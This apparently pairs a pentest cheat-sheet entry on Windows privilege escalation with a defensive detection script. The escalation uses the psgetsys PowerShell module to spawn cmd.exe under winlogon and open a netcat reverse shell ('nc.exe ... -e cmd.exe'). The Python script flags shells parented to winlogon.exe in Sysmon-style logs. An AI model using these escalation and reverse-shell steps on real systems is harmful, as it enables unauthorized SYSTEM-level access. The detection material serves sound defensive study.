With this privilege you can update the process attribute list of a new process and use that to elevate privileges. Use the module below to do that.
Module:
https://github.com/decoder-it/psgetsystem/blob/master/psgetsys.ps1
Copy the above ps1 to the victim machine, then run:
import-module .\psgetsys.ps1
Find the PID of a privileged process:
Get-Process winlogon
Use that PID to attach and execute commands:
[MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c c:\windows\temp\nc.exe 127.0.0.1 4444 -e cmd.exe")
Note:
1. Make sure netcat is uploaded to the file path specified in the above command.
2. If you close the shell, you have to repeat the whole process to get another shell.
3. Make sure you set up an nc listener to catch the admin shell.
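
Detection side: the steps above leave a command shell whose recorded parent is winlogon.exe. The following is an added example (not part of the original note or of psgetsys) that triages process-creation records for that pattern. The field names follow Sysmon Event ID 1; the sample records, the allow-list of expected winlogon.exe children and the function names are assumptions constructed for illustration.

```python
import ntpath

# Assumption: processes winlogon.exe normally starts; tune this list per environment.
EXPECTED_WINLOGON_CHILDREN = {"userinit.exe", "logonui.exe", "dwm.exe", "fontdrvhost.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def _name(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return ntpath.basename(path).lower()

def score_event(ev):
    """Return the reasons a process-creation record looks reparented; [] if none."""
    if _name(ev.get("ParentImage", "")) != "winlogon.exe":
        return []
    reasons = []
    child = _name(ev.get("Image", ""))
    if child not in EXPECTED_WINLOGON_CHILDREN:
        reasons.append(f"unexpected child of winlogon.exe: {child}")
    if child in SHELLS:
        reasons.append("command shell parented to winlogon.exe")
    if "\\windows\\temp\\" in ev.get("CommandLine", "").lower():
        reasons.append("command line references a binary in C:\\Windows\\Temp")
    return reasons

def triage(events):
    """Return (ProcessId, reasons) for every record with at least one reason."""
    return [(ev["ProcessId"], r) for ev in events if (r := score_event(ev))]

# Constructed sample records using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"ProcessId": 812, "Image": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r"C:\Windows\system32\userinit.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe"},
    {"ProcessId": 3044, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 4321, "Image": r"c:\windows\system32\cmd.exe",
     "CommandLine": r"c:\windows\system32\cmd.exe /c c:\windows\temp\nc.exe 127.0.0.1 4444 -e cmd.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe"},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

Only the third record is flagged; a shell started from explorer.exe and the normal userinit.exe child of winlogon.exe pass untouched.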